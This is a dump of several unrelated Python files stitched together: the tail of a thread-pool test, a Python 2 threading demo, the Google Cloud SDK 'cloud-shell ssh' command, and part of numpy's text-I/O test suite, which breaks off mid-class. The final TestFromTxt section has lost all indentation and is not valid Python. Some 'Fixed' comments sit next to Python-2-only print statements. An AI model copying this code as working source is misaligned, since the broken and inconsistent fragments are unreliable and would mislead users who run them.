    def test_force_run_in_thread_without_threads(self):
        # with zero threads, force_run_in_thread uses eventlet.tpool
        pool = utils.ThreadPool(0)
        self.assertNotEqual(self._thread_id(),
                            pool.force_run_in_thread(self._thread_id))
        captured = pool.force_run_in_thread(self._capture_args, 1, 2,
                                            bert='ernie')
        self.assertEqual(captured,
                         {'args': (1, 2), 'kwargs': {'bert': 'ernie'}})
        self.assertRaises(ValueError, pool.force_run_in_thread,
                          self._raise_valueerror)
if __name__ == '__main__':
    # Allow running this test module directly.
    unittest.main()
|
mt_sleep2.py | # Copyright (c) 2014 ASMlover. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list ofconditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materialsprovided with the
# distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
import threading
from time import sleep, ctime
LOOPS = [4, 2]
class ThreadFunc(object):
    """Callable wrapper binding a function to a fixed argument tuple.

    Instances are handed to ``threading.Thread`` as the ``target``;
    calling the instance invokes ``func(*args)``.
    """

    def __init__(self, func, args, name=''):
        self.name = name    # informational label (typically func.__name__)
        self.func = func
        self.args = args

    def __call__(self):
        # Fixed: apply() is Python-2-only (removed in Python 3); argument
        # unpacking is the equivalent, portable spelling.
        self.func(*self.args)
def Loop(nloop, nsec):
    # Worker body: log start, sleep `nsec` seconds, log completion.
    # (Python 2 print statements -- this module targets Python 2.)
    print 'start Loop', nloop, 'at:', ctime()
    sleep(nsec)
    print 'Loop', nloop, 'DONE at:', ctime()
def Main():
    # Spawn one thread per entry in LOOPS, start them all, then wait.
    print 'starting at:', ctime()
    threads = []
    nloops = range(len(LOOPS))
    # Create all threads first so they can be started together below.
    for i in nloops:
        t = threading.Thread(target=ThreadFunc(Loop, (i, LOOPS[i]),
                                               Loop.__name__))
        threads.append(t)
    for i in nloops:
        threads[i].start()
    # Block until every worker finishes.
    for i in nloops:
        threads[i].join()
    print 'all DONE at:', ctime()
if __name__ == '__main__':
    # Run the demo when executed as a script.
    Main()
|
ssh.py | # -*- coding: utf-8 -*- #
# Copyright 2018 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""cloud-shell ssh command."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
import threading
from googlecloudsdk.calliope import base
from googlecloudsdk.command_lib.cloud_shell import util
from googlecloudsdk.command_lib.util.ssh import ssh
from googlecloudsdk.core import log
from googlecloudsdk.core import properties
@base.ReleaseTracks(base.ReleaseTrack.ALPHA)
class SshAlpha(base.Command):
  """Allows you to establish an interactive SSH session with Cloud Shell."""

  detailed_help = {
      'DESCRIPTION':
          """\
*{command}* lets you remotely log in to Cloud Shell. If your Cloud Shell
is not currently running, this will cause it to be started before
establishing the SSH session.
""",
      'EXAMPLES':
          """\
To SSH into your Cloud Shell, run:
    $ {command}
To run a remote command in your Cloud Shell, run:
    $ {command} --command=ls
""",
  }

  @staticmethod
  def Args(parser):
    """Registers ssh-specific flags on top of the common Cloud Shell args."""
    util.ParseCommonArgs(parser)
    parser.add_argument(
        '--command',
        help="""\
A command to run in Cloud Shell.
Runs the command in Cloud Shell and then exits.
""")
    parser.add_argument(
        '--dry-run',
        help="""\
If provided, prints the command that would be run to standard out
instead of executing it.
""",
        action='store_true')
    parser.add_argument(
        '--ssh-flag',
        help='Additional flags to be passed to *ssh(1)*.',
        action='append')

  def Run(self, args):
    """Builds the SSH command and either prints it (--dry-run) or runs it.

    While the session runs, a daemon thread periodically re-authorizes the
    environment so long-lived sessions keep working credentials.
    """
    # Without --command, open an interactive login shell.
    command_list = args.command.split(' ') if args.command else ['bash -l']
    project = properties.VALUES.core.project.Get()
    connection_info = util.PrepareEnvironment(args)
    command = ssh.SSHCommand(
        remote=ssh.Remote(host=connection_info.host, user=connection_info.user),
        port=str(connection_info.port),
        identity_file=connection_info.key,
        remote_command=(['DEVSHELL_PROJECT_ID=' + project]
                        if project else []) + command_list,
        extra_flags=args.ssh_flag,
        # Allocate a tty only for interactive sessions.
        tty=not args.command,
        options={'StrictHostKeyChecking': 'no'},
    )
    if args.dry_run:
      log.Print(' '.join(command.Build(connection_info.ssh_env)))
    else:
      self.done = threading.Event()
      thread = threading.Thread(target=self.Reauthorize, args=())
      thread.daemon = True  # don't keep the process alive after the session
      thread.start()
      command.Run(connection_info.ssh_env)
      self.done.set()

  def Reauthorize(self):
    """Refreshes environment authorization periodically until done is set."""
    while not self.done.is_set():
      self.done.wait(30 * 60)  # Push every 30 minutes
      # Fixed: wait() also returns when Run() sets the event at session end;
      # re-check so we don't issue one final, pointless refresh.
      if not self.done.is_set():
        util.AuthorizeEnvironment()
|
test_io.py | import sys
import gzip
import os
import threading
from tempfile import mkstemp, NamedTemporaryFile
import time
from datetime import datetime
import warnings
import numpy as np
import numpy.ma as ma
from numpy.lib._iotools import ConverterError, ConverterLockError, \
ConversionWarning
from numpy.compat import asbytes, asbytes_nested, bytes
from nose import SkipTest
from numpy.ma.testutils import (TestCase, assert_equal, assert_array_equal,
assert_raises, run_module_suite)
from numpy.testing import assert_warns, assert_
# Python 3 has no bytes-accepting StringIO; emulate the Python 2 StringIO
# API on top of BytesIO so the tests below can write byte strings either way.
if sys.version_info[0] >= 3:
    from io import BytesIO

    def StringIO(s=""):
        # Coerce a (unicode) string argument to bytes before wrapping.
        return BytesIO(asbytes(s))
else:
    from StringIO import StringIO
    BytesIO = StringIO

# Major/minor interpreter version, used in platform-specific branches below.
MAJVER, MINVER = sys.version_info[:2]
def strptime(s, fmt=None):
    """Parse *s* with *fmt* and return the corresponding ``datetime``.

    Thin wrapper around ``time.strptime`` (``datetime.strptime`` only
    exists from Python 2.5); only year/month/day are kept.
    """
    if sys.version_info[0] >= 3:
        # On Python 3 the tests hand in byte strings; decode first.
        fields = time.strptime(s.decode('latin1'), fmt)
    else:
        fields = time.strptime(s, fmt)
    return datetime(*fields[:3])
class RoundtripTest(object):
    # Mixin providing save -> np.load roundtrip machinery; subclasses plug
    # in the save function (np.save / np.savez) and compare the results.
    def roundtrip(self, save_func, *args, **kwargs):
        """
        save_func : callable
            Function used to save arrays to file.
        file_on_disk : bool
            If true, store the file on disk, instead of in a
            string buffer.
        save_kwds : dict
            Parameters passed to `save_func`.
        load_kwds : dict
            Parameters passed to `numpy.load`.
        args : tuple of arrays
            Arrays stored to file.
        """
        save_kwds = kwargs.get('save_kwds', {})
        load_kwds = kwargs.get('load_kwds', {})
        file_on_disk = kwargs.get('file_on_disk', False)
        if file_on_disk:
            # Do not delete the file on windows, because we can't
            # reopen an already opened file on that platform, so we
            # need to close the file and reopen it, implying no
            # automatic deletion.
            if sys.platform == 'win32' and MAJVER >= 2 and MINVER >= 6:
                target_file = NamedTemporaryFile(delete=False)
            else:
                target_file = NamedTemporaryFile()
            load_file = target_file.name
        else:
            # In-memory roundtrip: the buffer doubles as the load source.
            target_file = StringIO()
            load_file = target_file
        arr = args
        save_func(target_file, *arr, **save_kwds)
        target_file.flush()
        target_file.seek(0)
        if sys.platform == 'win32' and not isinstance(target_file, BytesIO):
            target_file.close()
        arr_reloaded = np.load(load_file, **load_kwds)
        # Stash both sides so subclasses can compare after this returns.
        self.arr = arr
        self.arr_reloaded = arr_reloaded

    def test_array(self):
        # Roundtrip float, int and complex (single/double) 2-D arrays.
        a = np.array([[1, 2], [3, 4]], float)
        self.roundtrip(a)

        a = np.array([[1, 2], [3, 4]], int)
        self.roundtrip(a)

        a = np.array([[1 + 5j, 2 + 6j], [3 + 7j, 4 + 8j]], dtype=np.csingle)
        self.roundtrip(a)

        a = np.array([[1 + 5j, 2 + 6j], [3 + 7j, 4 + 8j]], dtype=np.cdouble)
        self.roundtrip(a)

    def test_1D(self):
        a = np.array([1, 2, 3, 4], int)
        self.roundtrip(a)

    @np.testing.dec.knownfailureif(sys.platform == 'win32', "Fail on Win32")
    def test_mmap(self):
        # Memory-mapped reload requires a real file on disk.
        a = np.array([[1, 2.5], [4, 7.3]])
        self.roundtrip(a, file_on_disk=True, load_kwds={'mmap_mode': 'r'})

    def test_record(self):
        a = np.array([(1, 2), (3, 4)], dtype=[('x', 'i4'), ('y', 'i4')])
        self.roundtrip(a)
class TestSaveLoad(RoundtripTest, TestCase):
    # Roundtrip a single array through np.save / np.load.
    def roundtrip(self, *args, **kwargs):
        RoundtripTest.roundtrip(self, np.save, *args, **kwargs)
        # np.save stores exactly one array; compare it to the reloaded copy.
        assert_equal(self.arr[0], self.arr_reloaded)
class TestSavezLoad(RoundtripTest, TestCase):
    """Roundtrip tests through np.savez / np.load."""

    def roundtrip(self, *args, **kwargs):
        RoundtripTest.roundtrip(self, np.savez, *args, **kwargs)
        # savez names unnamed arrays arr_0, arr_1, ... in storage order.
        for n, arr in enumerate(self.arr):
            assert_equal(arr, self.arr_reloaded['arr_%d' % n])

    def test_multiple_arrays(self):
        a = np.array([[1, 2], [3, 4]], float)
        b = np.array([[1 + 2j, 2 + 7j], [3 - 6j, 4 + 12j]], complex)
        self.roundtrip(a, b)

    def test_named_arrays(self):
        a = np.array([[1, 2], [3, 4]], float)
        b = np.array([[1 + 2j, 2 + 7j], [3 - 6j, 4 + 12j]], complex)
        c = StringIO()
        np.savez(c, file_a=a, file_b=b)
        c.seek(0)
        l = np.load(c)
        assert_equal(a, l['file_a'])
        assert_equal(b, l['file_b'])

    def test_savez_filename_clashes(self):
        # Test that issue #852 is fixed
        # and savez functions in multithreaded environment
        def writer(error_list):
            fd, tmp = mkstemp(suffix='.npz')
            os.close(fd)
            try:
                arr = np.random.randn(500, 500)
                try:
                    np.savez(tmp, arr=arr)
                # Fixed: "except OSError, err" is Python-2-only syntax; the
                # "as" form works on Python 2.6+ and Python 3.
                except OSError as err:
                    error_list.append(err)
            finally:
                os.remove(tmp)

        errors = []
        # Fixed: xrange is Python-2-only; range is equivalent here.
        threads = [threading.Thread(target=writer, args=(errors,))
                   for j in range(3)]
        for t in threads:
            t.start()
        for t in threads:
            t.join()
        if errors:
            raise AssertionError(errors)
class TestSaveTxt(TestCase):
    """np.savetxt: formats, delimiters, headers/footers and file roundtrip."""

    def test_array(self):
        a = np.array([[1, 2], [3, 4]], float)
        fmt = "%.18e"
        c = StringIO()
        np.savetxt(c, a, fmt=fmt)
        c.seek(0)
        assert_equal(c.readlines(),
                     asbytes_nested(
                         [(fmt + ' ' + fmt + '\n') % (1, 2),
                          (fmt + ' ' + fmt + '\n') % (3, 4)]))

        a = np.array([[1, 2], [3, 4]], int)
        c = StringIO()
        np.savetxt(c, a, fmt='%d')
        c.seek(0)
        assert_equal(c.readlines(), asbytes_nested(['1 2\n', '3 4\n']))

    def test_1D(self):
        a = np.array([1, 2, 3, 4], int)
        c = StringIO()
        np.savetxt(c, a, fmt='%d')
        c.seek(0)
        lines = c.readlines()
        assert_equal(lines, asbytes_nested(['1\n', '2\n', '3\n', '4\n']))

    def test_record(self):
        a = np.array([(1, 2), (3, 4)], dtype=[('x', 'i4'), ('y', 'i4')])
        c = StringIO()
        np.savetxt(c, a, fmt='%d')
        c.seek(0)
        assert_equal(c.readlines(), asbytes_nested(['1 2\n', '3 4\n']))

    def test_delimiter(self):
        a = np.array([[1., 2.], [3., 4.]])
        c = StringIO()
        np.savetxt(c, a, delimiter=asbytes(','), fmt='%d')
        c.seek(0)
        assert_equal(c.readlines(), asbytes_nested(['1,2\n', '3,4\n']))

    def test_format(self):
        a = np.array([(1, 2), (3, 4)])
        c = StringIO()
        # Sequence of formats
        np.savetxt(c, a, fmt=['%02d', '%3.1f'])
        c.seek(0)
        assert_equal(c.readlines(), asbytes_nested(['01 2.0\n', '03 4.0\n']))

        # A single multiformat string
        c = StringIO()
        np.savetxt(c, a, fmt='%02d : %3.1f')
        c.seek(0)
        lines = c.readlines()
        assert_equal(lines, asbytes_nested(['01 : 2.0\n', '03 : 4.0\n']))

        # Specify delimiter, should be overiden
        c = StringIO()
        np.savetxt(c, a, fmt='%02d : %3.1f', delimiter=',')
        c.seek(0)
        lines = c.readlines()
        assert_equal(lines, asbytes_nested(['01 : 2.0\n', '03 : 4.0\n']))

    def test_header_footer(self):
        """
        Test the functionality of the header and footer keyword argument.
        """
        c = StringIO()
        # Fixed: np.int was merely a deprecated alias of the builtin int
        # (removed in numpy 1.24); the builtin is equivalent.
        a = np.array([(1, 2), (3, 4)], dtype=int)
        test_header_footer = 'Test header / footer'
        # Test the header keyword argument
        np.savetxt(c, a, fmt='%1d', header=test_header_footer)
        c.seek(0)
        assert_equal(c.read(),
                     asbytes('# ' + test_header_footer + '\n1 2\n3 4\n'))
        # Test the footer keyword argument
        c = StringIO()
        np.savetxt(c, a, fmt='%1d', footer=test_header_footer)
        c.seek(0)
        assert_equal(c.read(),
                     asbytes('1 2\n3 4\n# ' + test_header_footer + '\n'))
        # Test the commentstr keyword argument used on the header
        c = StringIO()
        commentstr = '% '
        np.savetxt(c, a, fmt='%1d', header=test_header_footer,
                   comments=commentstr)
        c.seek(0)
        assert_equal(c.read(),
                     asbytes(commentstr + test_header_footer + '\n' + '1 2\n3 4\n'))
        # Test the commentstr keyword argument used on the footer
        c = StringIO()
        commentstr = '% '
        np.savetxt(c, a, fmt='%1d', footer=test_header_footer,
                   comments=commentstr)
        c.seek(0)
        assert_equal(c.read(),
                     asbytes('1 2\n3 4\n' + commentstr + test_header_footer + '\n'))

    def test_file_roundtrip(self):
        f, name = mkstemp()
        os.close(f)
        try:
            a = np.array([(1, 2), (3, 4)])
            np.savetxt(name, a)
            b = np.loadtxt(name)
            assert_array_equal(a, b)
        finally:
            # Always remove the temp file, even if an assertion failed.
            os.unlink(name)

    def test_complex_arrays(self):
        ncols = 2
        nrows = 2
        a = np.zeros((ncols, nrows), dtype=np.complex128)
        re = np.pi
        im = np.e
        a[:] = re + 1.0j * im
        # One format only
        c = StringIO()
        np.savetxt(c, a, fmt=' %+.3e')
        c.seek(0)
        lines = c.readlines()
        assert_equal(lines, asbytes_nested([
            ' ( +3.142e+00+ +2.718e+00j) ( +3.142e+00+ +2.718e+00j)\n',
            ' ( +3.142e+00+ +2.718e+00j) ( +3.142e+00+ +2.718e+00j)\n']))
        # One format for each real and imaginary part
        c = StringIO()
        np.savetxt(c, a, fmt='  %+.3e' * 2 * ncols)
        c.seek(0)
        lines = c.readlines()
        assert_equal(lines, asbytes_nested([
            '  +3.142e+00  +2.718e+00  +3.142e+00  +2.718e+00\n',
            '  +3.142e+00  +2.718e+00  +3.142e+00  +2.718e+00\n']))
        # One format for each complex number
        c = StringIO()
        np.savetxt(c, a, fmt=['(%.3e%+.3ej)'] * ncols)
        c.seek(0)
        lines = c.readlines()
        assert_equal(lines, asbytes_nested([
            '(3.142e+00+2.718e+00j) (3.142e+00+2.718e+00j)\n',
            '(3.142e+00+2.718e+00j) (3.142e+00+2.718e+00j)\n']))
class TestLoadTxt(TestCase):
    # np.loadtxt behaviour: dtypes, converters, comments, usecols, ndmin...
    # NOTE(review): Python-2-era module; several tests rely on py2-only
    # constructs (see inline notes).
    def test_record(self):
        c = StringIO()
        c.write(asbytes('1 2\n3 4'))
        c.seek(0)
        x = np.loadtxt(c, dtype=[('x', np.int32), ('y', np.int32)])
        a = np.array([(1, 2), (3, 4)], dtype=[('x', 'i4'), ('y', 'i4')])
        assert_array_equal(x, a)

        d = StringIO()
        d.write(asbytes('M 64.0 75.0\nF 25.0 60.0'))
        d.seek(0)
        mydescriptor = {'names': ('gender', 'age', 'weight'),
                        'formats': ('S1',
                                    'i4', 'f4')}
        b = np.array([('M', 64.0, 75.0),
                      ('F', 25.0, 60.0)], dtype=mydescriptor)
        y = np.loadtxt(d, dtype=mydescriptor)
        assert_array_equal(y, b)

    def test_array(self):
        # Same text parsed as int and as float.
        c = StringIO()
        c.write(asbytes('1 2\n3 4'))

        c.seek(0)
        x = np.loadtxt(c, dtype=int)
        a = np.array([[1, 2], [3, 4]], int)
        assert_array_equal(x, a)

        c.seek(0)
        x = np.loadtxt(c, dtype=float)
        a = np.array([[1, 2], [3, 4]], float)
        assert_array_equal(x, a)

    def test_1D(self):
        c = StringIO()
        c.write(asbytes('1\n2\n3\n4\n'))
        c.seek(0)
        x = np.loadtxt(c, dtype=int)
        a = np.array([1, 2, 3, 4], int)
        assert_array_equal(x, a)

        c = StringIO()
        c.write(asbytes('1,2,3,4\n'))
        c.seek(0)
        x = np.loadtxt(c, dtype=int, delimiter=',')
        a = np.array([1, 2, 3, 4], int)
        assert_array_equal(x, a)

    def test_missing(self):
        # A converter supplies a sentinel value for the empty field.
        c = StringIO()
        c.write(asbytes('1,2,3,,5\n'))
        c.seek(0)
        x = np.loadtxt(c, dtype=int, delimiter=',', \
            converters={3:lambda s: int(s or - 999)})
        a = np.array([1, 2, 3, -999, 5], int)
        assert_array_equal(x, a)

    def test_converters_with_usecols(self):
        c = StringIO()
        c.write(asbytes('1,2,3,,5\n6,7,8,9,10\n'))
        c.seek(0)
        x = np.loadtxt(c, dtype=int, delimiter=',', \
            converters={3:lambda s: int(s or - 999)}, \
            usecols=(1, 3,))
        a = np.array([[2, -999], [7, 9]], int)
        assert_array_equal(x, a)

    def test_comments(self):
        c = StringIO()
        c.write(asbytes('# comment\n1,2,3,5\n'))
        c.seek(0)
        x = np.loadtxt(c, dtype=int, delimiter=',', \
            comments='#')
        a = np.array([1, 2, 3, 5], int)
        assert_array_equal(x, a)

    def test_skiprows(self):
        c = StringIO()
        c.write(asbytes('comment\n1,2,3,5\n'))
        c.seek(0)
        x = np.loadtxt(c, dtype=int, delimiter=',', \
            skiprows=1)
        a = np.array([1, 2, 3, 5], int)
        assert_array_equal(x, a)

        c = StringIO()
        c.write(asbytes('# comment\n1,2,3,5\n'))
        c.seek(0)
        x = np.loadtxt(c, dtype=int, delimiter=',', \
            skiprows=1)
        a = np.array([1, 2, 3, 5], int)
        assert_array_equal(x, a)

    def test_usecols(self):
        a = np.array([[1, 2], [3, 4]], float)
        c = StringIO()
        np.savetxt(c, a)
        c.seek(0)
        x = np.loadtxt(c, dtype=float, usecols=(1,))
        assert_array_equal(x, a[:, 1])

        a = np.array([[1, 2, 3], [3, 4, 5]], float)
        c = StringIO()
        np.savetxt(c, a)
        c.seek(0)
        x = np.loadtxt(c, dtype=float, usecols=(1, 2))
        assert_array_equal(x, a[:, 1:])

        # Testing with arrays instead of tuples.
        c.seek(0)
        x = np.loadtxt(c, dtype=float, usecols=np.array([1, 2]))
        assert_array_equal(x, a[:, 1:])

        # Checking with dtypes defined converters.
        data = '''JOE 70.1 25.3
BOB 60.5 27.9
'''
        c = StringIO(data)
        names = ['stid', 'temp']
        dtypes = ['S4', 'f8']
        # NOTE(review): zip() as a dtype spec relies on Python 2 returning
        # a list; on Python 3 this would need list(zip(...)).
        arr = np.loadtxt(c, usecols=(0, 2), dtype=zip(names, dtypes))
        assert_equal(arr['stid'], asbytes_nested(["JOE", "BOB"]))
        assert_equal(arr['temp'], [25.3, 27.9])

    def test_fancy_dtype(self):
        # Nested structured dtype.
        c = StringIO()
        c.write(asbytes('1,2,3.0\n4,5,6.0\n'))
        c.seek(0)
        dt = np.dtype([('x', int), ('y', [('t', int), ('s', float)])])
        x = np.loadtxt(c, dtype=dt, delimiter=',')
        a = np.array([(1, (2, 3.0)), (4, (5, 6.0))], dt)
        assert_array_equal(x, a)

    def test_shaped_dtype(self):
        c = StringIO("aaaa  1.0  8.0  1 2 3 4 5 6")
        dt = np.dtype([('name', 'S4'), ('x', float), ('y', float),
                       ('block', int, (2, 3))])
        x = np.loadtxt(c, dtype=dt)
        a = np.array([('aaaa', 1.0, 8.0, [[1, 2, 3], [4, 5, 6]])],
                     dtype=dt)
        assert_array_equal(x, a)

    def test_3d_shaped_dtype(self):
        c = StringIO("aaaa  1.0  8.0  1 2 3 4 5 6 7 8 9 10 11 12")
        dt = np.dtype([('name', 'S4'), ('x', float), ('y', float),
                       ('block', int, (2, 2, 3))])
        x = np.loadtxt(c, dtype=dt)
        a = np.array([('aaaa', 1.0, 8.0, [[[1, 2, 3], [4, 5, 6]],[[7, 8, 9], [10, 11, 12]]])],
                     dtype=dt)
        assert_array_equal(x, a)

    def test_empty_file(self):
        # Empty input yields an empty array (warning suppressed).
        warnings.filterwarnings("ignore", message="loadtxt: Empty input file:")
        c = StringIO()
        x = np.loadtxt(c)
        assert_equal(x.shape, (0,))
        x = np.loadtxt(c, dtype=np.int64)
        assert_equal(x.shape, (0,))
        assert_(x.dtype == np.int64)

    def test_unused_converter(self):
        # Converters for columns excluded via usecols must be ignored.
        c = StringIO()
        c.writelines([asbytes('1 21\n'), asbytes('3 42\n')])
        c.seek(0)
        data = np.loadtxt(c, usecols=(1,),
                          converters={0: lambda s: int(s, 16)})
        assert_array_equal(data, [21, 42])

        c.seek(0)
        data = np.loadtxt(c, usecols=(1,),
                          converters={1: lambda s: int(s, 16)})
        assert_array_equal(data, [33, 66])

    def test_dtype_with_object(self):
        "Test using an explicit dtype with an object"
        from datetime import date
        import time
        data = asbytes(""" 1; 2001-01-01
                   2; 2002-01-31 """)
        # NOTE(review): np.object is a deprecated alias of the builtin
        # object (removed in numpy 1.24).
        ndtype = [('idx', int), ('code', np.object)]
        func = lambda s: strptime(s.strip(), "%Y-%m-%d")
        converters = {1: func}
        test = np.loadtxt(StringIO(data), delimiter=";", dtype=ndtype,
                          converters=converters)
        control = np.array([(1, datetime(2001, 1, 1)), (2, datetime(2002, 1, 31))],
                           dtype=ndtype)
        assert_equal(test, control)

    def test_uint64_type(self):
        # Values above int64 range must survive as uint64.
        tgt = (9223372043271415339, 9223372043271415853)
        c = StringIO()
        c.write(asbytes("%s %s" % tgt))
        c.seek(0)
        res = np.loadtxt(c, dtype=np.uint64)
        assert_equal(res, tgt)

    def test_int64_type(self):
        tgt = (-9223372036854775807, 9223372036854775807)
        c = StringIO()
        c.write(asbytes("%s %s" % tgt))
        c.seek(0)
        res = np.loadtxt(c, dtype=np.int64)
        assert_equal(res, tgt)

    def test_universal_newline(self):
        # '\r'-terminated lines must be handled like '\n'.
        f, name = mkstemp()
        os.write(f, asbytes('1 21\r3 42\r'))
        os.close(f)

        try:
            data = np.loadtxt(name)
            assert_array_equal(data, [[1, 21], [3, 42]])
        finally:
            os.unlink(name)

    def test_empty_field_after_tab(self):
        c = StringIO()
        c.write(asbytes('1 \t2 \t3\tstart \n4\t5\t6\t  \n7\t8\t9.5\t'))
        c.seek(0)
        dt = { 'names': ('x', 'y', 'z', 'comment'),
               'formats': ('<i4', '<i4', '<f4', '|S8')}
        x = np.loadtxt(c, dtype=dt, delimiter='\t')
        # Trailing whitespace of the string column is preserved.
        a = np.array([asbytes('start '), asbytes('  '), asbytes('')])
        assert_array_equal(x['comment'], a)

    def test_structure_unpack(self):
        # unpack=True splits a structured result into per-field arrays.
        txt = StringIO(asbytes("M 21 72\nF 35 58"))
        dt = { 'names': ('a', 'b', 'c'), 'formats': ('|S1', '<i4', '<f4')}
        a, b, c = np.loadtxt(txt, dtype=dt, unpack=True)
        assert_(a.dtype.str == '|S1')
        assert_(b.dtype.str == '<i4')
        assert_(c.dtype.str == '<f4')
        assert_array_equal(a, np.array([asbytes('M'), asbytes('F')]))
        assert_array_equal(b, np.array([21, 35]))
        assert_array_equal(c, np.array([ 72.,  58.]))

    def test_ndmin_keyword(self):
        # ndmin must be an integer in {0, 1, 2}; it controls the minimum
        # dimensionality of the result.
        c = StringIO()
        c.write(asbytes('1,2,3\n4,5,6'))
        c.seek(0)
        assert_raises(ValueError, np.loadtxt, c, ndmin=3)
        c.seek(0)
        assert_raises(ValueError, np.loadtxt, c, ndmin=1.5)
        c.seek(0)
        x = np.loadtxt(c, dtype=int, delimiter=',', ndmin=1)
        a = np.array([[1, 2, 3], [4, 5, 6]])
        assert_array_equal(x, a)
        d = StringIO()
        d.write(asbytes('0,1,2'))
        d.seek(0)
        x = np.loadtxt(d, dtype=int, delimiter=',', ndmin=2)
        assert_(x.shape == (1, 3))
        d.seek(0)
        x = np.loadtxt(d, dtype=int, delimiter=',', ndmin=1)
        assert_(x.shape == (3,))
        d.seek(0)
        x = np.loadtxt(d, dtype=int, delimiter=',', ndmin=0)
        assert_(x.shape == (3,))
        e = StringIO()
        e.write(asbytes('0\n1\n2'))
        e.seek(0)
        x = np.loadtxt(e, dtype=int, delimiter=',', ndmin=2)
        assert_(x.shape == (3, 1))
        e.seek(0)
        x = np.loadtxt(e, dtype=int, delimiter=',', ndmin=1)
        assert_(x.shape == (3,))
        e.seek(0)
        x = np.loadtxt(e, dtype=int, delimiter=',', ndmin=0)
        assert_(x.shape == (3,))

        # Test ndmin kw with empty file.
        f = StringIO()
        assert_(np.loadtxt(f, ndmin=2).shape == (0, 1,))
        assert_(np.loadtxt(f, ndmin=1).shape == (0,))

    def test_generator_source(self):
        # loadtxt also accepts any iterable of lines, e.g. a generator.
        def count():
            for i in range(10):
                yield asbytes("%d" % i)
        res = np.loadtxt(count())
        assert_array_equal(res, np.arange(10))
class Testfromregex(TestCase):
    # np.fromregex: build structured arrays by applying a regex to each line.
    def test_record(self):
        # Float field plus a 3-char string field.
        c = StringIO()
        c.write(asbytes('1.312 foo\n1.534 bar\n4.444 qux'))
        c.seek(0)

        dt = [('num', np.float64), ('val', 'S3')]
        x = np.fromregex(c, r"([0-9.]+)\s+(...)", dt)
        a = np.array([(1.312, 'foo'), (1.534, 'bar'), (4.444, 'qux')],
                     dtype=dt)
        assert_array_equal(x, a)

    def test_record_2(self):
        # Integer field plus a string field.
        c = StringIO()
        c.write(asbytes('1312 foo\n1534 bar\n4444 qux'))
        c.seek(0)

        dt = [('num', np.int32), ('val', 'S3')]
        x = np.fromregex(c, r"(\d+)\s+(...)", dt)
        a = np.array([(1312, 'foo'), (1534, 'bar'), (4444, 'qux')],
                     dtype=dt)
        assert_array_equal(x, a)

    def test_record_3(self):
        # Single captured group: the unparenthesized tail is discarded.
        c = StringIO()
        c.write(asbytes('1312 foo\n1534 bar\n4444 qux'))
        c.seek(0)

        dt = [('num', np.float64)]
        x = np.fromregex(c, r"(\d+)\s+...", dt)
        a = np.array([(1312,), (1534,), (4444,)], dtype=dt)
        assert_array_equal(x, a)
#####--------------------------------------------------------------------------
class TestFromTxt(TestCase):
#
def test_record(self):
"Test w/ explicit dtype"
data = StringIO(asbytes('1 2\n3 4'))
# data.seek(0)
test = np.ndfromtxt(data, dtype=[('x', np.int32), ('y', np.int32)])
control = np.array([(1, 2), (3, 4)], dtype=[('x', 'i4'), ('y', 'i4')])
assert_equal(test, control)
#
data = StringIO('M 64.0 75.0\nF 25.0 60.0')
# data.seek(0)
descriptor = {'names': ('gender', 'age', 'weight'),
'formats': ('S1', 'i4', 'f4')}
control = np.array([('M', 64.0, 75.0), ('F', 25.0, 60.0)],
dtype=descriptor)
test = np.ndfromtxt(data, dtype=descriptor)
assert_equal(test, control)
def test_array(self):
"Test outputing a standard ndarray"
data = StringIO('1 2\n3 4')
control = np.array([[1, 2], [3, 4]], dtype=int)
test = np.ndfromtxt(data, dtype=int)
assert_array_equal(test, control)
#
data.seek(0)
control = np.array([[1, 2], [3, 4]], dtype=float)
test = np.loadtxt(data, dtype=float)
assert_array_equal(test, control)
def test_1D(self):
"Test squeezing to 1D"
control = np.array([1, 2, 3, 4], int)
#
data = StringIO('1\n2\n3\n4\n')
test = np.ndfromtxt(data, dtype=int)
assert_array_equal(test, control)
#
data = StringIO('1,2,3,4\n')
test = np.ndfromtxt(data, dtype=int, delimiter=asbytes(','))
assert_array_equal(test, control)
def test_comments(self):
"Test the stripping of comments"
control = np.array([1, 2, 3, 5], int)
# Comment on its own line
data = StringIO('# comment\n1,2,3,5\n')
test = np.ndfromtxt(data, dtype=int, delimiter=asbytes(','), comments=asbytes('#'))
assert_equal(test, control)
# Comment at the end of a line
data = StringIO('1,2,3,5# comment\n')
test = np.ndfromtxt(data, dtype=int, delimiter=asbytes(','), comments=asbytes('#'))
assert_equal(test, control)
def test_skiprows(self):
"Test row skipping"
control = np.array([1, 2, 3, 5], int)
kwargs = dict(dtype=int, delimiter=asbytes(','))
#
data = StringIO('comment\n1,2,3,5\n')
test = np.ndfromtxt(data, skip_header=1, **kwargs)
assert_equal(test, control)
#
